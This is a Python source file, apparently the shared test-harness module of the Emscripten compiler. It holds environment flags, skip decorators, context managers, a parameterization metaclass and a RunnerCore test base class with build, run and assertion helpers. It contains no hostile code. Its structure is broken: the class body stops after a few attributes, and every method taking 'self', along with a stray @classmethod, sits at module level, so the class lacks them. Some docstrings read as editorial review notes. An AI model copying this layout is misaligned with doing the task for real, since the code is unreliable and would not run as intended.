EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')

EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))

# TODO(sbc): Remove this check for the legacy name once its been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"

# EMTEST_SAVE_DIR=1 keeps test output in a fixed directory; =2 additionally
# preserves its previous contents between runs (see RunnerCore.setUp).
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))

# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')

EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')

EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')

# Verbosity can come from the env var or from the tools' own DEBUG flag.
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0')) or shared.DEBUG

if EMTEST_VERBOSE:
    logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
    # EMTEST_BROWSER='0' explicitly disables browser tests; any other value
    # (including unset/None) leaves them enabled.
    return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
    """Wrap *func* so the test is skipped when self.<condition>() is truthy
    (or falsy, with negate=True). The skip reason is the condition name plus
    the optional explanation.

    Unlike before, the wrapped function's return value is now propagated.
    """
    assert callable(func)
    explanation_str = ' : %s' % explanation if explanation else ''

    @wraps(func)
    def decorated(self, *args, **kwargs):
        choice = self.__getattribute__(condition)()
        if negate:
            choice = not choice
        if choice:
            self.skipTest(condition + explanation_str)
        # BUGFIX: the original dropped the result of the wrapped function.
        return func(self, *args, **kwargs)
    return decorated
def needs_dlfcn(func):
    """Run self.check_dlfcn() (which may skip the test) before the test body."""
    assert callable(func)

    @wraps(func)
    def decorated(self):
        self.check_dlfcn()
        return func(self)

    return decorated
def is_slow_test(func):
    """Skip the wrapped test when EMTEST_SKIP_SLOW is set in the environment."""
    assert callable(func)

    @wraps(func)
    def decorated(self, *args, **kwargs):
        if not EMTEST_SKIP_SLOW:
            return func(self, *args, **kwargs)
        return self.skipTest('skipping slow tests')

    return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
    """Unconditional skip retained from the fastcomp era (see TODO above)."""
    assert not callable(note)
    skip_decorator = unittest.skip(note)
    return skip_decorator
def disabled(note=''):
    """Unconditionally skip the decorated test, recording *note* as the reason."""
    assert not callable(note)
    skip_decorator = unittest.skip(note)
    return skip_decorator
def no_mac(note=''):
    """Skip the decorated test on macOS; elsewhere, leave it untouched."""
    assert not callable(note)
    if not MACOS:
        return lambda f: f
    return unittest.skip(note)
def no_windows(note=''):
    """Skip the decorated test on Windows; elsewhere, leave it untouched."""
    assert not callable(note)
    if not WINDOWS:
        return lambda f: f
    return unittest.skip(note)
def requires_native_clang(func):
    """Skip the test when native clang tests are disabled
    (EMTEST_LACKS_NATIVE_CLANG set in the environment).

    Now applies @wraps like the other decorators in this file so the wrapped
    test keeps its name/docstring; without it, test discovery and reports
    showed 'decorated' instead of the real test name.
    """
    assert callable(func)

    @wraps(func)
    def decorated(self, *args, **kwargs):
        if EMTEST_LACKS_NATIVE_CLANG:
            return self.skipTest('native clang tests are disabled')
        return func(self, *args, **kwargs)
    return decorated
@contextlib.contextmanager
def env_modify(updates):
    """Context manager that applies *updates* to os.environ and restores the
    previous environment on exit. A value of None removes that variable.

    This could also be done with mock.patch.dict() but taking a dependency
    on the mock library is probably not worth the benefit.
    """
    saved_env = os.environ.copy()
    print("env_modify: " + str(updates))
    to_clear = [key for key, value in updates.items() if value is None]
    to_set = {key: value for key, value in updates.items() if value is not None}
    os.environ.update(to_set)
    for key in to_clear:
        os.environ.pop(key, None)
    try:
        yield
    finally:
        os.environ.clear()
        os.environ.update(saved_env)
# Decorator version of env_modify
def with_env_modify(updates):
    """Run the decorated test method with *updates* applied to os.environ."""
    def wrapper(f):
        def wrapped(self):
            with env_modify(updates):
                return f(self)
        return wrapped
    return wrapper
@contextlib.contextmanager
def chdir(dir):
    """Temporarily change the working directory to *dir*, restoring it on exit."""
    previous_cwd = os.getcwd()
    os.chdir(dir)
    try:
        yield
    finally:
        os.chdir(previous_cwd)
@contextlib.contextmanager
def js_engines_modify(replacements):
    """Temporarily replace shared.JS_ENGINES, restoring the original on exit."""
    saved_engines = shared.JS_ENGINES
    shared.JS_ENGINES = replacements
    try:
        yield
    finally:
        shared.JS_ENGINES = saved_engines
@contextlib.contextmanager
def wasm_engines_modify(replacements):
    """Temporarily replace shared.WASM_ENGINES, restoring the original on exit."""
    saved_engines = shared.WASM_ENGINES
    shared.WASM_ENGINES = replacements
    try:
        yield
    finally:
        shared.WASM_ENGINES = saved_engines
def ensure_dir(dirname):
    """Create *dirname* (including parents) if it does not already exist.

    Uses exist_ok=True instead of the previous isdir()-then-makedirs() pair,
    which was racy: another process could create the directory between the
    check and the creation, making makedirs() raise FileExistsError.
    """
    os.makedirs(dirname, exist_ok=True)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
    """Truncate *string* to at most roughly maxlines lines and maxbytes
    characters, keeping the head and tail with a '[..]' marker in between."""
    lines = string.splitlines()
    if len(lines) > maxlines:
        half = maxlines // 2
        lines = lines[0:half] + ['[..]'] + lines[-half:]
        string = '\n'.join(lines)
    if len(string) > maxbytes:
        half = maxbytes // 2
        string = string[0:half] + '\n[..]\n' + string[-half:]
    return string
def create_test_file(name, contents, binary=False):
    """Write *contents* to the relative path *name* (text mode unless binary)."""
    assert not os.path.isabs(name)
    with open(name, 'wb' if binary else 'w') as f:
        f.write(contents)
def make_executable(name):
    """Give *name* owner read/write/execute permission (mode 0o700)."""
    # S_IRUSR/S_IWUSR/S_IXUSR are the POSIX names for the same bits as
    # S_IREAD/S_IWRITE/S_IEXEC.
    os.chmod(name, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# The core test modes
# Each entry corresponds to a test-suite class generated for a particular
# optimization level ('0'..'3', 's', 'z') of the wasm or wasm2js pipeline.
core_test_modes = [
    'wasm0',
    'wasm1',
    'wasm2',
    'wasm3',
    'wasms',
    'wasmz',
    'strict',
    'wasm2js0',
    'wasm2js1',
    'wasm2js2',
    'wasm2js3',
    'wasm2jss',
    'wasm2jsz',
]

# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'

# The non-core test modes
non_core_test_modes = [
    'other',
    'browser',
    'sanity',
    'sockets',
    'interactive',
    'benchmark',
    'asan',
    'lsan',
    'wasm2ss',
]
def parameterized(parameters):
    """
    Mark a test as parameterized.

    Usage:
      @parameterized({
        'subtest1': (1, 2, 3),
        'subtest2': (4, 5, 6),
      })
      def test_something(self, a, b, c):
        ... # actual test body

    This is equivalent to defining two tests:

      def test_something_subtest1(self):
        # runs test_something(1, 2, 3)

      def test_something_subtest2(self):
        # runs test_something(4, 5, 6)

    The tag is consumed by RunnerMeta, which expands the method into one
    concrete test per entry.
    """
    def tag(func):
        func._parameterize = parameters
        return func
    return tag
class RunnerMeta(type):
    """Metaclass that expands @parameterized test methods into one concrete
    test method per parameterization."""

    @classmethod
    def make_test(mcs, name, func, suffix, args):
        """
        Build one concrete test function for a single parameterization.

        :param name: the original name of the function
        :param func: the original function that we are parameterizing
        :param suffix: the suffix to append to the name of the function for this parameterization
        :param args: the positional arguments to pass to the original function for this parameterization
        :returns: a tuple of (new_function_name, new_function_object)
        """
        # The new test simply forwards to the original with the bound args;
        # @wraps copies over the function attributes.
        @wraps(func)
        def resulting_test(self):
            return func(self, *args)

        # Rename so failures and reports show which parameterization ran.
        resulting_test.__name__ = f'{name}_{suffix}' if suffix else name
        # __qualname__ is the full dot-separated path; suffix it as well.
        resulting_test.__qualname__ = f'{func.__qualname__}_{suffix}'
        return resulting_test.__name__, resulting_test

    def __new__(mcs, name, bases, attrs):
        # Expand parameterized members of `attrs` into separate ones.
        expanded = {}
        for attr_name, value in attrs.items():
            # @parameterized tags its target with _parameterize.
            if hasattr(value, '_parameterize'):
                for suffix, args in value._parameterize.items():
                    new_name, func = mcs.make_test(attr_name, value, suffix, args)
                    assert new_name not in expanded, 'Duplicate attribute name generated when parameterizing %s' % attr_name
                    expanded[new_name] = func
            else:
                # Plain member: copy it over verbatim.
                assert attr_name not in expanded, '%s collided with an attribute from parameterization' % attr_name
                expanded[attr_name] = value
        # Delegate actual class creation to type with the expanded namespace.
        return type.__new__(mcs, name, bases, expanded)
class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
    """Shared base class for the emscripten test suites: manages per-test
    working/temp directories, -s setting overrides, emcc argument assembly
    and building/verifying test output."""

    # default temporary directory settings. set_temp_dir may be called later to
    # override these
    temp_dir = TEMP_DIR
    canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)

    # This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
    # Change this to None to get stderr reporting, for debugging purposes
    stderr_redirect = STDOUT
def is_wasm(self):
    # WASM=0 selects the wasm2js path; anything else produces real wasm.
    return self.get_setting('WASM') != 0
def check_dlfcn(self):
    """Skip the current test when dynamic linking is unsupported in this
    configuration (memory growth without wasm, wasm2js, or asan)."""
    growth = self.get_setting('ALLOW_MEMORY_GROWTH')
    if growth == 1 and not self.is_wasm():
        self.skipTest('no dlfcn with memory growth (without wasm)')
    if not self.get_setting('WASM'):
        self.skipTest('no dynamic library support in wasm2js yet')
    if '-fsanitize=address' in self.emcc_args:
        self.skipTest('no dynamic library support in asan yet')
def uses_memory_init_file(self):
    # Side modules handle memory differently, and for wasm (not wasm2js)
    # binaryen puts the memory inside the wasm module - no init file either way.
    if self.get_setting('SIDE_MODULE') or \
       (self.get_setting('WASM') and not self.get_setting('WASM2JS')):
        return False
    elif '--memory-init-file' in self.emcc_args:
        # Explicit flag: its following argument is 0 or 1.
        return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
    else:
        # Without an explicit flag, optimized builds emit a memory init file.
        opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
        return opt_supports
def set_temp_dir(self, temp_dir):
    """Redirect this test's (and EMCC's, via the environment) temporary
    output to *temp_dir*."""
    self.temp_dir = temp_dir
    self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
    # Explicitly set dedicated temporary directory for parallel tests
    os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
    """One-time environment sanity check before the first test in the class."""
    super(RunnerCore, cls).setUpClass()
    print('(checking sanity from test runner)')  # do this after we set env stuff
    shared.check_sanity(force=True)
def setUp(self):
    """Per-test init: reset settings/args, optionally snapshot the temp dir
    for leak detection, and create and enter a working directory."""
    super(RunnerCore, self).setUp()
    self.settings_mods = {}
    self.emcc_args = ['-Werror']
    self.env = {}
    self.temp_files_before_run = []
    self.uses_es6 = False
    if EMTEST_DETECT_TEMPFILE_LEAKS:
        # Record everything currently under the temp dir so tearDown can
        # diff against it and report anything this test leaves behind.
        for root, dirnames, filenames in os.walk(self.temp_dir):
            for dirname in dirnames:
                self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
            for filename in filenames:
                self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
    self.banned_js_engines = []
    self.use_all_engines = EMTEST_ALL_ENGINES
    if EMTEST_SAVE_DIR:
        # Fixed, persistent output directory for debugging test output.
        self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
        if os.path.exists(self.working_dir):
            if EMTEST_SAVE_DIR == 2:
                print('Not clearing existing test directory')
            else:
                print('Clearing existing test directory')
                # Even when EMTEST_SAVE_DIR we still try to start with an empty directory as many tests
                # expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
                # run. This can be useful when iterating on a given test with extra files you want to keep
                # around in the output directory.
                delete_contents(self.working_dir)
        else:
            print('Creating new test output directory')
            ensure_dir(self.working_dir)
    else:
        # Normal case: fresh unique directory per test, removed in tearDown.
        self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
    os.chdir(self.working_dir)

    if not EMTEST_SAVE_DIR:
        # Note whether any .ll files pre-exist in the shared temp dir.
        self.has_prev_ll = False
        for temp_file in os.listdir(TEMP_DIR):
            if temp_file.endswith('.ll'):
                self.has_prev_ll = True
def tearDown(self):
    """Per-test cleanup: remove the working directory (unless saving output)
    and, when enabled, fail the test if it leaked temp files."""
    if not EMTEST_SAVE_DIR:
        # rmtree() fails on Windows if the current working directory is inside the tree.
        os.chdir(os.path.dirname(self.get_dir()))
        try_delete(self.get_dir())

    if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
        # Re-walk the temp dir and diff against the snapshot taken in setUp.
        temp_files_after_run = []
        for root, dirnames, filenames in os.walk(self.temp_dir):
            for dirname in dirnames:
                temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
            for filename in filenames:
                temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))

        # Our leak detection will pick up *any* new temp files in the temp dir.
        # They may not be due to us, but e.g. the browser when running browser
        # tests. Until we figure out a proper solution, ignore some temp file
        # names that we see on our CI infrastructure.
        ignorable_file_prefixes = [
            '/tmp/tmpaddon',
            '/tmp/circleci-no-output-timeout',
            '/tmp/wasmer'
        ]

        left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
        left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
        if len(left_over_files):
            print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
            for f in left_over_files:
                print('leaked file: ' + f, file=sys.stderr)
            self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key):
    """Return this test's override for *key*, falling back to the global default."""
    try:
        return self.settings_mods[key]
    except KeyError:
        return Settings[key]
def set_setting(self, key, value=1):
    """Override the -s setting *key* for this test. Passing None removes the
    override entirely."""
    if value is None:
        self.clear_setting(key)
        # BUGFIX: previously fell through and re-inserted key=None, so
        # get_setting() returned None instead of the real default and
        # serialize_settings() emitted '-s KEY=null'.
        return
    self.settings_mods[key] = value
def has_changed_setting(self, key):
    """True when this test has an explicit override for *key*."""
    return key in self.settings_mods
def clear_setting(self, key):
    """Drop any override for *key*; a no-op when none exists."""
    self.settings_mods.pop(key, None)
def serialize_settings(self):
    """Turn settings_mods into a flat list of '-s KEY[=json]' emcc flags.

    A value of 1 is the common 'enabled' case and is emitted as a bare key.
    """
    flags = []
    for key, value in self.settings_mods.items():
        if value == 1:
            flags.extend(['-s', key])
        else:
            flags.extend(['-s', '{}={}'.format(key, json.dumps(value))])
    return flags
def get_dir(self):
    # The per-test working directory created in setUp().
    return self.working_dir
def in_dir(self, *pathelems):
    """Return a path joined under the test's working directory."""
    return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
    """Inject *code* into Module.preRun via a generated --pre-js file."""
    create_test_file('prerun.js', 'Module.preRun = function() { %s }' % code)
    self.emcc_args.extend(['--pre-js', 'prerun.js'])
def add_post_run(self, code):
    # NOTE(review): injected via --pre-js (not --post-js) — presumably so
    # Module.postRun is assigned before startup reads it; confirm intent.
    create_test_file('postrun.js', 'Module.postRun = function() { %s }' % code)
    self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
    # NOTE(review): like add_post_run, this uses --pre-js so Module.onExit
    # exists before the program runs; confirm intent.
    create_test_file('onexit.js', 'Module.onExit = function() { %s }' % code)
    self.emcc_args += ['--pre-js', 'onexit.js']
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
#                  (like --pre-js) do not need to be passed when building
#                  libraries, for example
def get_emcc_args(self, main_file=False):
    args = self.serialize_settings() + self.emcc_args
    if not main_file:
        # Mark injection flags and their file arguments, then filter them out.
        idx = 0
        while idx < len(args):
            if args[idx] in ('--pre-js', '--post-js'):
                args[idx] = None
                args[idx + 1] = None
                idx += 2
            else:
                idx += 1
        args = [arg for arg in args if arg is not None]
    return args
def verify_es5(self, filename):
    """Verify the generated JS is ES5-compliant using the es-check npm tool."""
    es_check = shared.get_npm_cmd('es-check')
    # use --quiet once its available
    # See: https://github.com/dollarshaveclub/es-check/pull/126/
    cmd = es_check + ['es5', os.path.abspath(filename)]
    try:
        shared.run_process(cmd, stderr=PIPE)
    except subprocess.CalledProcessError as e:
        print(e.stderr)
        self.fail('es-check failed to verify ES5 output compliance')
# Build JavaScript code from source code
def build(self, filename, libraries=None, includes=None, force_c=False,
          post_build=None, js_outfile=True):
    """Compile `filename` with emcc/em++ into a .js (or .wasm) output.

    Fixes over the original: mutable default arguments replaced with None
    sentinels, and the memory-init-file check reads via a context manager
    instead of leaking the handle.
    """
    libraries = libraries or []
    includes = includes or []
    suffix = '.js' if js_outfile else '.wasm'
    # C++ sources use em++; everything else links with emcc + C++ stdlibs.
    if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
        compiler = [EMXX]
    else:
        # TODO(https://github.com/emscripten-core/emscripten/issues/11121)
        # We link with C++ stdlibs, even when linking with emcc for historical reasons. We can remove
        # this if this issues is fixed.
        compiler = [EMCC, '-nostdlib++']
    dirname, basename = os.path.split(filename)
    output = shared.unsuffixed(basename) + suffix
    cmd = compiler + [filename, '-o', output] + self.get_emcc_args(main_file=True) + \
        ['-I.', '-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
        ['-I' + include for include in includes] + \
        libraries
    self.run_process(cmd, stderr=self.stderr_redirect if not DEBUG else None)
    self.assertExists(output)
    if js_outfile and not self.uses_es6:
        self.verify_es5(output)
    if post_build:
        post_build(output)
    if js_outfile and self.uses_memory_init_file():
        with open(output) as f:
            src = f.read()
        # side memory init file, or an empty one in the js
        assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def get_func(self, src, name):
    """Extract the full text of JS function `name` from source string `src`.

    Scans forward from 'function <name>(' counting braces and returns the
    substring up to the matching close brace. Raises ValueError if the
    function is absent; asserts if braces never balance.

    The success return must be nested under the '}' branch — otherwise the
    zero depth before the opening brace would terminate the scan immediately.
    """
    start = src.index('function ' + name + '(')
    pos = start
    depth = 0
    while True:
        ch = src[pos]
        if ch == '{':
            depth += 1
        elif ch == '}':
            depth -= 1
            if depth == 0:
                return src[start:pos + 1]
        pos += 1
        assert pos < len(src)
def count_funcs(self, javascript_file):
    """Count 'function ' occurrences between the EMSCRIPTEN funcs markers."""
    start_tok = "// EMSCRIPTEN_START_FUNCS"
    end_tok = "// EMSCRIPTEN_END_FUNCS"
    with open(javascript_file, 'rt') as f:
        blob = f.read()
    begin = blob.find(start_tok) + len(start_tok)
    end = blob.find(end_tok)
    return blob[begin:end].count('function ')
def count_wasm_contents(self, wasm_binary, what):
    """Return the integer metric '[what] : N' reported by wasm-opt --metrics."""
    wasm_opt = os.path.join(building.get_binaryen_bin(), 'wasm-opt')
    out = self.run_process([wasm_opt, wasm_binary, '--metrics'], stdout=PIPE).stdout
    # output is something like
    # [?] : 125
    needle = '[' + what + ']'
    for line in out.splitlines():
        if needle in line:
            return int(line.split(':')[1].strip())
    self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
    """Disassemble a wasm binary to text (.wat) via binaryen's wasm-dis."""
    wasm_dis = os.path.join(building.get_binaryen_bin(), 'wasm-dis')
    return self.run_process([wasm_dis, wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
    """True if the module's disassembly contains an export of `name`."""
    needle = '(export "%s"' % name
    return needle in self.get_wasm_text(wasm)
def run_js(self, filename, engine=None, args=None, output_nicerizer=None, assert_returncode=0):
    """Run a built JS/wasm file under `engine` and return its combined output.

    Fixes over the original: the four open() handles (two writes, two reads)
    are closed deterministically via context managers instead of leaking,
    the mutable default `args=[]` is replaced with None, and the verbose
    log message interpolates the filename (the f-string previously printed
    a literal placeholder).
    """
    if args is None:
        args = []
    # use files, as PIPE can get too full and hang us
    stdout_path = self.in_dir('stdout')
    stderr_path = self.in_dir('stderr')
    error = None
    if EMTEST_VERBOSE:
        print(f"Running '{filename}' under '{engine}'")
    try:
        with open(stdout_path, 'w') as stdout, open(stderr_path, 'w') as stderr:
            jsrun.run_js(filename, engine, args,
                         stdout=stdout,
                         stderr=stderr,
                         assert_returncode=assert_returncode)
    except subprocess.CalledProcessError as e:
        error = e
    # Make sure that we produced proper line endings to the .js file we are about to run.
    if not filename.endswith('.wasm'):
        self.assertEqual(line_endings.check_line_endings(filename), 0)
    with open(stdout_path, 'r') as f:
        out = f.read()
    with open(stderr_path, 'r') as f:
        err = f.read()
    if output_nicerizer:
        ret = output_nicerizer(out, err)
    else:
        ret = out + err
    if error or EMTEST_VERBOSE:
        print('-- begin program output --')
        print(ret, end='')
        print('-- end program output --')
    if error:
        if assert_returncode == NON_ZERO:
            self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
        else:
            self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
    # We should pass all strict mode checks
    self.assertNotContained('strict warning:', ret)
    return ret
def assertExists(self, filename, msg=None):
    """Assert that `filename` exists on disk."""
    message = msg or ('Expected file not found: ' + filename)
    self.assertTrue(os.path.exists(filename), message)
def assertNotExists(self, filename, msg=None):
    """Assert that `filename` does NOT exist on disk."""
    message = msg or ('Unexpected file exists: ' + filename)
    self.assertFalse(os.path.exists(filename), message)
def assertPathsIdentical(self, path1, path2):
    """Assert two paths are identical modulo separator style.

    E.g. "C:/foo" is considered equal to "C:\\foo".
    """
    def normalize(p):
        return p.replace('\\', '/')
    return self.assertIdentical(normalize(path1), normalize(path2))
def assertTextDataIdentical(self, text1, text2, msg=None,
                            fromfile='expected', tofile='actual'):
    """assertIdentical after normalizing line endings.

    Windows "\\r\\n" sequences are converted to "\\n" in both texts first.
    """
    unix1 = text1.replace('\r\n', '\n')
    unix2 = text2.replace('\r\n', '\n')
    return self.assertIdentical(unix1, unix2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
                    fromfile='expected', tofile='actual'):
    """Assert `y` equals `values` (or one of them, if a list/tuple).

    On mismatch, fail with a unified diff against the last candidate.
    """
    if type(values) not in (list, tuple):
        values = [values]
    diff = ''
    for candidate in values:
        if candidate == y:
            return  # success
        diff_lines = difflib.unified_diff(candidate.splitlines(), y.splitlines(),
                                          fromfile=fromfile, tofile=tofile)
        diff = ''.join(line.rstrip() + '\n' for line in diff_lines)
    if EMTEST_VERBOSE:
        print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
    fail_message = 'Unexpected difference:\n' + limit_size(diff)
    if not EMTEST_VERBOSE:
        fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
    if msg:
        fail_message += '\n' + msg
    self.fail(fail_message)
def assertIdenticalUrlEncoded(self, expected, actual, **kwargs):
    """URL decodes the `actual` parameter before checking for equality."""
    decoded = unquote(actual)
    self.assertIdentical(expected, decoded, **kwargs)
def assertTextDataContained(self, text1, text2):
    """assertContained after normalizing Windows line endings in both texts."""
    unix1 = text1.replace('\r\n', '\n')
    unix2 = text2.replace('\r\n', '\n')
    return self.assertContained(unix1, unix2)
def assertContained(self, values, string, additional_info=''):
    """Assert that at least one of `values` occurs as a substring of `string`.

    `string` may be a callable producing the haystack lazily.
    """
    if type(values) not in [list, tuple]:
        values = [values]
    values = list(map(asstr, values))
    if callable(string):
        string = string()
    if any(v in string for v in values):
        return
    diff_lines = difflib.unified_diff(values[0].split('\n'), string.split('\n'),
                                      fromfile='expected', tofile='actual')
    diff = ''.join(line.rstrip() + '\n' for line in diff_lines)
    self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
        limit_size(values[0]), limit_size(string), limit_size(diff),
        additional_info
    ))
def assertNotContained(self, value, string):
    """Assert that `value` does NOT occur as a substring of `string`.

    Either argument may be a callable that lazily produces its text.
    """
    if callable(value):
        value = value()  # lazy loading
    if callable(string):
        string = string()
    if value not in string:
        return
    diff_lines = difflib.unified_diff(value.split('\n'), string.split('\n'),
                                      fromfile='expected', tofile='actual')
    diff = ''.join(line.rstrip() + '\n' for line in diff_lines)
    self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
        limit_size(value), limit_size(string), limit_size(diff)
    ))
def assertContainedIf(self, value, string, condition):
    """assertContained when `condition` is truthy, else assertNotContained."""
    check = self.assertContained if condition else self.assertNotContained
    check(value, string)
def assertBinaryEqual(self, file1, file2):
    """Assert the two files have identical sizes and identical byte contents.

    Fix over the original: the files are read via context managers so the
    handles are closed deterministically instead of being left for GC.
    """
    self.assertEqual(os.path.getsize(file1),
                     os.path.getsize(file2))
    with open(file1, 'rb') as f1, open(file2, 'rb') as f2:
        self.assertEqual(f1.read(), f2.read())
# Class-level cache mapping a library cache key to the list of
# (basename, contents) pairs produced by its build, so tests reuse builds.
library_cache = {}

def get_build_dir(self):
    """Return (creating it if needed) the 'building' subdir of the working dir."""
    build_path = os.path.join(self.get_dir(), 'building')
    ensure_dir(build_path)
    return build_path
def get_library(self, name, generated_libs, configure=['sh', './configure'],
                configure_args=[], make=['make'], make_args=None,
                env_init={}, cache_name_extra='', native=False):
    """Build a third-party test library, or reuse it from the class cache.

    The cache key mixes the library name, the short emcc flags, and an md5
    of the full flag list + env so that different configurations do not
    collide. On a cache hit the cached file contents are written back into
    the build dir and their paths returned.

    NOTE(review): `configure`, `configure_args` and `env_init` are mutable
    defaults; they appear not to be mutated here, but confirm build_library
    doesn't mutate them before refactoring.
    """
    if make_args is None:
        make_args = ['-j', str(building.get_num_cores())]
    build_dir = self.get_build_dir()
    output_dir = self.get_dir()
    emcc_args = self.get_emcc_args()
    # Hash the full flags + env; short flags (< 7 chars) also go into the
    # readable part of the cache name.
    hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
    cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
    # Sanitize: anything outside [A-Za-z0-9_] becomes '_' so the key is a
    # safe filename component.
    valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
    cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
    if self.library_cache.get(cache_name):
        print('<load %s from cache> ' % cache_name, file=sys.stderr)
        generated_libs = []
        for basename, contents in self.library_cache[cache_name]:
            bc_file = os.path.join(build_dir, cache_name + '_' + basename)
            with open(bc_file, 'wb') as f:
                f.write(contents)
            generated_libs.append(bc_file)
        return generated_libs
    print(f'<building and saving {cache_name} into cache>', file=sys.stderr)
    return build_library(name, build_dir, output_dir, generated_libs, configure,
                         configure_args, make, make_args, self.library_cache,
                         cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
    """Delete everything in the working dir, plus the emscripten temp dir if set."""
    for entry in os.listdir(self.get_dir()):
        try_delete(os.path.join(self.get_dir(), entry))
    if EMSCRIPTEN_TEMP_DIR:
        for entry in os.listdir(EMSCRIPTEN_TEMP_DIR):
            try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, entry))
def run_process(self, cmd, check=True, **args):
    """Wrapper around shared.run_process.

    This is desirable so that the tests can fail (in the unittest sense)
    rather than error'ing: a non-zero exit with check=True becomes
    self.fail. In the long run it would be nice to completely remove the
    dependency on core emscripten code (shared.py) here.
    """
    try:
        return shared.run_process(cmd, check=check, **args)
    except subprocess.CalledProcessError as e:
        if not check or e.returncode == 0:
            return None
        self.fail('subprocess exited with non-zero return code(%d): `%s`' %
                  (e.returncode, shared.shlex_join(cmd)))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
    """Run a subprocess and assert that it returns non-zero.
    Return the stderr of the subprocess.
    """
    proc = self.run_process(cmd, check=False, stderr=PIPE, **args)
    self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
    # When we check for failure we expect a user-visible error, not a traceback.
    # However, on windows a python traceback can happen randomly sometimes,
    # due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
    if WINDOWS and 'Access is denied' in proc.stderr:
        return proc.stderr
    self.assertNotContained('Traceback', proc.stderr)
    return proc.stderr
def setup_runtimelink_test(self):
    """Write header.h and supp.cpp to the working dir and return the
    (main, supp) C++ sources used by the runtime-linking tests.

    main and supp each call into the other and read each other's globals,
    so the pair exercises cross-module symbol resolution.
    """
    create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
    supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
    create_test_file('supp.cpp', supp)
    main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
    return (main, supp)
# excercise dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run under broswer it excercises how dynamic linker handles concurrency
